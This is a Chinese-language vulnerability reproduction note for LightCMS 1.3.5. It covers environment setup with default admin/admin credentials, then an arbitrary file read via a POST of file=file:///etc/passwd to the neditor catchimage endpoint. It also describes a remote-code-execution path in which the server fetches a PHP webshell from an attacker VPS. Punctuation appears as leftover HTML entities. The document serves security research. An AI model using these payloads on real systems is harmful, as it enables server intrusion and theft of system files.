开发笔记:LightCMS1.3.5任意文件读取&RCE漏洞

个人环境配置&＃xff1a;php7.4.15 &＃43; mysql8.0.25

1. 首先确保系统已安装好composer&＃xff0c;可以参考我之前写的文章&＃xff1a;文章链接
2. 下载文件源码

cd /var/www/html
git clone https://hub.fastgit.org/eddy8/LightCMS.git
cd lightCMS
composer install


3. 设置目录权限&＃xff1a;storage/和bootstrap/cache/目录需要写入权限。

sudo chmod 777 -R storage/ bootstrap/cache/


4. 新建一份环境配置&＃xff0c;并配置好数据库等相关配置

cp .env.example .env
数据库配置&＃xff1a;
CREATE DATABASE homestead;
CREATE USER &＃39;homestead&＃39;&＃64;&＃39;localhost&＃39; IDENTIFIED BY &＃39;secret&＃39;;
GRANT ALL PRIVILEGES ON *.* TO &＃39;homestead&＃39;&＃64;&＃39;localhost&＃39;;
FLUSH PRIVILEGES;


初始化系统

php artisan migrate --seed
PS:这里可能会遇到一些问题&＃xff0c;我备注一下自己遇到的问题及其解决方案
1、安装组件时如果无法生成vendor目录可以运行composer install --ignore-platform-reqs命令
2、启动服务时Illuminate\\Database\\QueryException报错可能是因为没有安装php-mysql依赖
step1:php -v
step2: Install php mysql extension
php 7.x sudo apt-get install php7.x-mysql
step3: service apache2 restart
step4: php artisan migrate


5. 后台访问地址&＃xff1a;/admin/login

默认用户&＃xff08;此用户为超级用户&＃xff0c;不受权限管理限制&＃xff09;&＃xff1a;admin/admin
这里可能会遇到图形验证码无法显示&＃xff0c;终端输入&＃xff1a;apt-get install php7.x-gd


利用点一

使用admin/admin登录管理员
访问http://ip/admin/neditor/serve/catchimage&＃xff0c;POST传file&＃61;file:///etc/passwd&＃xff0c;此时会返回

{"list":[{"url":"http://light.com/upload/image/202106/0f1726ba83325848d47e216b29d5ab99.jpg","source":"file:///etc/passwd","state":"SUCCESS"}]}


根据返回值&＃xff0c;直接访问链接地址即可

利用点二

直接传php文件RCE&＃xff0c;构造一个php脚本放置vps下&＃xff0c;访问读取该文件

这个漏洞出在app/Http/Controllers/Admin/NEditorController.php中的远程下载图片的功能

这里简单使用了file_get_contents来获取并保存文件内容&＃xff0c;所以我们可以使用file协议实现任意文件读取等ssrf操作&＃xff0c;更危险的是这里的逻辑是取到的文件名后缀是什么&＃xff0c;保存的就是什么后缀&＃xff0c;所以我们可以放一个php一句话在服务器上&＃xff0c;然后来请求该一句话文件来达到getshell的目的